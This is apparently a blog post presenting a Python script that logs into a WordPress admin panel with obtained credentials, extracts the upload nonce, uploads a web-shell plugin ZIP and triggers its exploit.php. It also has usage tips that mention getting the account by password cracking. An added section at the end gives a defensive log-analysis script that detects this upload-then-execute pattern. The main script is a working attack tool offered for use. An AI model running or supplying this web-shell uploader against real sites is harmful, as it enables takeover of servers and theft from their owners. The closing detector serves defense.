I wrote a script to upload a WordPress plugin

  1. Purpose

While attacking a WordPress target, I wanted a handy script for uploading a web shell, but I couldn't find one on the web, so I wrote one by referring to the traffic generated by Metasploit's wp_admin_shell_upload module.

  1. Code

wp_plugin_upload.py

```python
#!/usr/bin/python
# coding: utf-8

import sys

import bs4
import requests

url = 'http://10.11.XX.XX'
loginUri = '/wp/wp-login.php'
adminUri = '/wp/wp-admin/'
pluginUri = '/wp/wp-admin/plugin-install.php?tab=upload'
uploadUri = '/wp/wp-admin/update.php?action=upload-plugin'
exploitUri = '/wp/wp-content/plugins/exploit_plugin/exploit.php'

# Headers
headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)'}

try:
    # Session (keeps the authentication cookies between requests)
    s = requests.Session()
    # wordpress_test_cookie is a cookie, not a request header
    s.cookies.set('wordpress_test_cookie', 'WP+Cookie+check')

    # Login
    loginData = {'log': 'admin', 'pwd': 'XXXX', 'redirect_to': url + adminUri, 'wp-submit': 'Login', 'rememberme': 'forever', 'testcookie': '1'}
    r = s.post(url + loginUri, data=loginData)
    r.raise_for_status()

    # Plugin Install Page
    r = s.get(url + pluginUri, headers=headers)
    r.raise_for_status()

    # Get Hidden Param _wpnonce
    # <input id="_wpnonce" name="_wpnonce" type="hidden" value="fdccb03ee7"/>
    # <input name="_wp_http_referer" type="hidden" value="/wp/wp-admin/plugin-install.php?tab=upload"/>
    # <input id="pluginzip" name="pluginzip" type="file"/>
    # <input class="button" id="install-plugin-submit" name="install-plugin-submit" type="submit" value="Install Now"/>
    bs4obj = bs4.BeautifulSoup(r.content, 'html5lib')
    wpnonce = bs4obj.find('input', id='_wpnonce')
    if wpnonce is None:
        # No upload form in the response (for example, the login failed)
        print('_wpnonce not found')
        sys.exit(1)
    # print(wpnonce['value'])

    # Zip Upload (field names match the hidden inputs of the form above)
    multiPartData = {'_wpnonce': wpnonce['value'],
                     '_wp_http_referer': '/wp/wp-admin/plugin-install.php?tab=upload',
                     'install-plugin-submit': 'Install Now'}

    # Open the ZIP only for the duration of the upload so the handle is closed afterwards
    with open('exploit_plugin.zip', 'rb') as f:
        uploadFile = {'pluginzip': ('exploit_plugin.zip', f, 'application/octet-stream', {'Content-Transfer-Encoding': 'binary'})}
        r = s.post(url + uploadUri, files=uploadFile, data=multiPartData, headers=headers)
    r.raise_for_status()

    # Exploit Run
    r = s.get(url + exploitUri)
    r.raise_for_status()

except requests.exceptions.RequestException as e:
    print(e)
    sys.exit(1)

print(r.status_code)
# print(r.text)
```

  1. How to use

If you put the compressed ZIP file (exploit_plugin.zip) in the same folder as the script, it will be uploaded to the plugins folder of WordPress. To run it, you first need to have obtained a WordPress account (by password cracking, etc.), and you need to rewrite the IP address and other values to match your environment.

```
$ python wp_plugin_upload.py
```
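Seen from the server, the script leaves a fixed trail in the access log: a POST to `update.php?action=upload-plugin` followed by a direct request to a `.php` file under `wp-content/plugins/` from the same client. The following is an added example, not part of the original post, that flags this sequence; the log lines are constructed, and the function name and the 10-minute correlation window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Fields used from a common/combined-format access log line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD = re.compile(r'/wp-admin/update\.php\?(?:.*&)?action=upload-plugin(?:&|$)')
PLUGIN_PHP = re.compile(r'/wp-content/plugins/([^/]+)/[^?]*\.php(?:\?|$)')


def find_upload_then_exec(lines, window=timedelta(minutes=10)):
    """Return (client, plugin_dir, path) for every direct request to a plugin
    .php file made by a client that uploaded a plugin ZIP within `window`.
    Assumes the log lines are in chronological order."""
    last_upload = {}  # client address -> time of its latest upload-plugin POST
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, '%d/%b/%Y:%H:%M:%S %z')
        if method == 'POST' and UPLOAD.search(path) and status.startswith('2'):
            last_upload[client] = when
            continue
        target = PLUGIN_PHP.search(path)
        seen = last_upload.get(client)
        if target and seen and timedelta(0) <= when - seen <= window:
            hits.append((client, target.group(1), path))
    return hits


# Constructed sample lines (documentation addresses), not from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2024:10:00:01 +0000] "POST /wp/wp-login.php HTTP/1.1" 302 0',
    '192.0.2.10 - - [12/Mar/2024:10:00:02 +0000] "GET /wp/wp-admin/plugin-install.php?tab=upload HTTP/1.1" 200 9120',
    '192.0.2.10 - - [12/Mar/2024:10:00:03 +0000] "POST /wp/wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4310',
    '198.51.100.7 - - [12/Mar/2024:10:00:04 +0000] "GET /wp/wp-content/plugins/sample-gallery/index.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [12/Mar/2024:10:00:05 +0000] "GET /wp/wp-content/plugins/exploit_plugin/exploit.php HTTP/1.1" 200 17',
]

if __name__ == '__main__':
    for hit in find_upload_then_exec(SAMPLE_LOG):
        print('plugin upload followed by direct PHP request:', hit)
```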
